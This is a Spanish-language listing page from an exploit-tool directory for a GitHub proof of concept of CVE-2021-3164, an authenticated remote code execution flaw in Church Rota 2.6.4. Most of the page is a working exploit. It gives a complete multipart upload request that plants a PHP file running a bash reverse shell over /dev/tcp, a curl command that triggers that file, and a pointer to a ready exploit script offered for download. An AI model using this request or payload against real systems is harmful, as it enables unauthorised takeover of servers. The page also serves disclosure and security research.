Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2021-3164 — Church Rota versión 2.6.4 es vulnerable a ejecución remota de código autenticada. El usuario no necesita tener permiso de carga de archivos para cargar y ejecutar un archivo arbitrario. La aplicación está escrita principalmente en PHP, por lo que usamos PHP en nuestra PoC | Kitploit
Herramientas/GitHubGitHub/rmccarth/cve-2021-3164
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubrmccarth/cve-2021-3164

cve-2021-3164

Church Rota versión 2.6.4 es vulnerable a ejecución remota de código autenticada. El usuario no necesita tener permiso de carga de archivos para cargar y ejecutar un archivo arbitrario. La aplicación está escrita principalmente en PHP, por lo que usamos PHP en nuestra PoC

Ver Repositorio
28hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Church Rota versión 2.6.4 es vulnerable a la ejecución remota de código autenticada. El usuario no necesita tener permiso de carga de archivos para cargar y ejecutar un archivo arbitrario.

Después de iniciar sesión en Church Rota, envía la siguiente solicitud, reemplazando con tu PHPSESSID:

root@kitploit:~
POST /resources.php?action=newsent HTTP/1.1

Host: localhost:8081

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------78920178725041013532564196488

Content-Length: 571

Origin: http://localhost:8081

Connection: close

Referer: http://localhost:8081/resources.php?action=new

Cookie: PHPSESSID=ivaa0ck3snt9ajlm0od9d7lh4j

Upgrade-Insecure-Requests: 1

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcename"

exec

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcefile"; filename="exec.php"

Content-Type: text/plain

<?php

exec("/bin/bash -c 'bash -i > /dev/tcp/127.0.0.1/1234 0>&1'");

?>


-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcedescription"



<p>text file upload</p>

-----------------------------78920178725041013532564196488--

El archivo se puede ejecutar con lo siguiente:

root@kitploit:~
curl localhost:80/documents/exec.php

o haciendo clic en el archivo debajo de 'resources' dentro de la interfaz web.

O simplemente pip install pwntools y requests, luego configura y ejecuta el script de explotación cve-2021-3164.py proporcionado.

Descargar herramienta